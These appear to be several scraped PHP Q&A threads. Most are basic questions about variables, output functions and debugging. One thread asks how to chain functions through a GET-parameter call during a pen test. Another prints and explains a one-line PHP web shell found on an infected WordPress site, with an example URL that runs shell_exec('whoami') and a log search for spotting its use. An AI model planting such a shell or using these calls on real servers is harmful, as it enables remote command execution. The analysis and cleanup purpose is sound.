I have the following code:
<?php
if(isset($_GET['function'])){
$_GET['function']();
}
?>
So if i entered this url:
http://localhost/?function=phpinfo
I will see the phpinfo function output on the screen.
can i have a way to concatenate 2 function in the url like this example:
http://localhost/?function=shell_exec('ls') AND phpinfo
So i want to see the first function output..
If you may asking why i need this, is because i am pen testing an web application with this situation..
Thanks for the help..
With your given code example it is not possible to do what you want. All your functions, so shellexec('ls') and phpinfo will be interpreted as one string, which is then called as a function in by calling it with added parenthis.
The only way that I can think of is using a variable parameter list, rather than just a single parameter. Get all the GET parameters in the function, and loop through them, executing each one.
Related
I have the following variables in my php test script :
$url="http://example.com";
$uri="/index.php";
$url="$url$uri";
echo $url;
This returns the values of 2 variables $url and $uri, and the result i get is :
http://example.com/index.php
My question is : if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable "http://example.com" ?
And in this situation how will I be able to echo the value of first variable? Do I need to move the first variable from top to middle? :
$uri="/index.php";
$url="$url$uri";
$url="http://example.com";
echo $url;
Any ideas?
Is order of variables important in php?
Order of statements is. PHP does things in the order you tell it to do them.
if php processes variables from top to bottom then ,why does "echo $url" not display the value of first variable
It does. It's just that that variable no longer has the value you gave it on line 1 because you gave it a new value on line 3.
And in this situation how will I be able to echo the value of first variable?
There are lots of approaches to that and …
Do I need to move the first variable from top to middle?
… would do it, but makes the line $url="$url$uri"; entirely pointless.
You need to step back and think about what you actually want to achieve.
If you need to keep the URL to the site root around and have the combined URL available somewhere, then maybe introducing a third variable name is the way forward.
If you are just debugging and want to make sure the value of $url is right before you change it, then you should probably move your echo statement instead.
I extracted this from a wordpress-site, that happened to be infected and gets cleaned up by me.
<?php ($_=#$_GET[page]).#$_($_POST[404]);?>
I suspect this line to be SEO spam, but I am not able to get the meaning of this line.
It's a PHP shell. If you rewrite it to the URL file.php?2=shell_exec&1=whoami executes the command whoami on the shell. In your example, one param is passed by POST, one by GET. So it's a bit harder to call.
You could also call other functions with it. The first parameter is always the function name, the second is a parameter for the called function.
Apparently it's explained on http://h.ackack.net/tiny-php-shell.html (https://twitter.com/dragosr/status/116759108526415872) but the site doesn't load for me.
/edit: If you have access to the server log files, you can search them to see if the hacker used this shell. A simple egrep "(&|\?)2=.+" logs* on the shell should work. You only see half of the executed command (only the GET, not POST), but maybe this helps to see if the attacker actually used his script.
PS: That was answered before here
Let's break this up a little bit:
($_=#$_GET[page]) . #$_($_POST[404]); First, this is two expressions being concatenated with the period: () . ().
In the first expression, $_ = $_GET[page], $_ is a variable, and is being assigned = to the variable $_GET['page'], or perhaps the output of an anonymous function it references. If $_GET[page] does reference an anonymous function, the # would be suppressing any errors from it.
The second expression, # $_( $_POST[404] ); is starting off with error suppression # of the anonymous function $_, which you can tell now is an anonymous function being called because it's followed by (. The argument passed to this function is $_POST['404'], and then the second parentheses just closes the call.
So I think your suspicions are correct; this looks like obfuscated code intended to look innocuous or part of the site. I suspect that the values for $_GET[page] and $_POST[404] are perhaps javascript strings whose echoing on the page would install malware or adware.
You can debug this more by looking at the values of those two variables and seeing what they are.
As best I can tell without knowing the values in GET and POST, it looks like the variable $_ is being assigned to the string $_GET[page], which would be whatever someone submits in the URL when they load the page. So, they are able to pass the string name of any function to the site and have it in PHP's scope.
Then, they are running that arbitrary function on the $_POST['404'] value. That value also is whatever the browser or user POSTs to the page.
The concatenation and outer parenthesis ().() might just be more obfuscation, or the point of this code might be to simply echo the results of this code on the page (to inject javascript) for example. But, it's also possible they are calling whatever function they want on whatever argument they've passed. I can't tell just by looking, but someone more conversant with PHP probably could.
Some functions in PHP (for ex. phpinfo, var_dump, print_r) has a direct output to browser and to store its result to a variable we need to use ob_* functions.
I cited the example of three these functions. Do you know any more? Is there a list of these functions? Thank you.
Off the top of my head, I know that PHP's printf function will also echo it's output instead of returning data. But to my knowledge, there's no list out there of all PHP functions that echo information rather than returning it.
A bit of a sidenote though, print_r actually has a boolean optional second parameter that allows you to control whether or not it echos it's output, or returns it.
I need to include two variables inside the brackets below, whats the correct way to do this please?
//Needs two variables stated
listDebug();
The proper syntax for passing 2 variables to a function in PHP looks like this:
//Needs two variables stated
listDebug($var1, $var2);
Edit:
Judging by the comments, it looks like listDebug() is a library function that only accepts one argument and that you cannot edit. It logs information to a database and its single argument represents the string to be logged. In this case, you want to log the value of 2 separate values. The most straight forward approach would be simply concatenate them together like so:
listDebug($var1 . ' ' . $var2);
Is this what you are looking for?
listDebug($variable1,$variable2);
Will need more information if you are looking for more.
Seems like listDebug function implementation hasn't been written to accept more than one argument.
So you just cannot pass 2 arguments there. Call the function twice... or rewrite the function to respect second argument.
To get this to work instead I did listDebug($var1.$var2); Thanks for your replies and advice.
My goal just debug
function dbg($var){
echo "you have passed $var";
}
call dbg($test)
output:
you have passed test
call dbg("var")
output:
you have passed "var"
In php .anyone could help me to do that?
Try this if $var is a global variable:
function dbg($var){
echo "you have passed {$GLOBALS[$var]}";
}
Well, the second case is fairly straightforward - you're passing a string and you want to display the string. No worries.
But for the first case, I'm afraid the answer is: No you can't.
Once inside the function, PHP doesn't know anything about the variable that was passed into it other than the value.
I can't really see that it would be of much value though. It would be trivial to change your code to pass in a name and a value -- ie something like this:
function dbg($name,$value) {
print "You passed $name, and the value was $value";
}
dbg('test',$test);
That's not really all that great either though -- you may as well just use print_r() and friends.
If you really want more powerful debugging tools, you should look into xDebug. It's a proper debugging tool for PHP, which allows you to step through the code line-by-line, and see the contents of variables at any point during the program run (among many other good features). It also integrates nicely with several popular IDEs.